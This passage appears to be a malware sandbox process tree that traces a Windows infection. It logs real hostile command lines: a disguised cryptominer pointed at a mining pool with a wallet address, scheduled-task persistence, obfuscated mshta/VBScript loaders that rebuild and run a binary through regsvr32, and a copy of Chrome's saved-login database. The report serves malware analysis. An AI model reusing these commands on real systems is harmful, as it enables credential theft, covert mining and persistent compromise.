                                                                                                                                                                                                                                PID:1536
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                  PID:696
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:5360
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:2648
                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 2648 -s 1544
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:5844
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:6692
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:5176
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:8992
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:7032
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                PID:4292
                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:6712
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                      PID:8616
                                                                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                          PID:7068
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        PID:2252
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:68
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                            Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:4360
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:1480
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:2660
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17332e41e6b.exe
                                                                                                                                                                                                                                              Mon17332e41e6b.exe
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:1484
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4197520.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4197520.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:3444
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3482271.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3482271.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:1556
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7933448.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7933448.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:1488
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2453573.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2453573.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                  PID:4560
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                    PID:1484
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5149335.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5149335.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:1300
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\41575.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\41575.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:4720
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                  Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:4392
                                                                                                                                                                                                                                                  • C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:5884
                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4392 -s 492
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:1964
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:4200
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                      Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:3136
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:2080
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:4920
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                        Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:4180
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe" -u
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:2472
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:2800
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                          Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:4100
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MSOVB.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MSOVB.tmp\Mon17bbf11fdb575d.tmp" /SL5="$80054,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe"
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:1872
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:2120
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-IQ678.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-IQ678.tmp\Mon17bbf11fdb575d.tmp" /SL5="$301A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                  PID:2972
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-CI0DS.tmp\postback.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-CI0DS.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                    PID:512
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:4204
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:2644
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                              PID:2412
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\control.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Adds policy Run key to start application
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        PID:5528
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          /c del "C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3316
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:8820
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:6732
                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:7248
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\msdt.exe"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1984
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Mmx4hv\i4g4vtj2.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Mmx4hv\i4g4vtj2.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:772
                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:2852
                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2708
                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:2700
                                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:2484
                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:2448
                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:1888
                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:1436
                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:1348
                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:1220
                                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      PID:1056
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                        PID:5208
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                        PID:8372
                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:356
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe
                                                                                                                                                                                                                                                                                        Mon175e6c8b40064b8c8.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                          PID:2468
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                                                                                                                                                                                                                                                                                6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:1552
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                    PID:3532
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL" ). RUn ( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                    PID:5300
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:3716
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                              PID:5460
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                              regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              PID:5664
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                        taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                        PID:4744
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                                                                  Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                  PID:3376
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bffc2992eb3d.exe
                                                                                                                                                                                                                                                                                                  Mon17bffc2992eb3d.exe /mixone
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  PID:1376
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 660
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                    PID:3680
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 664
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:1272
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 648
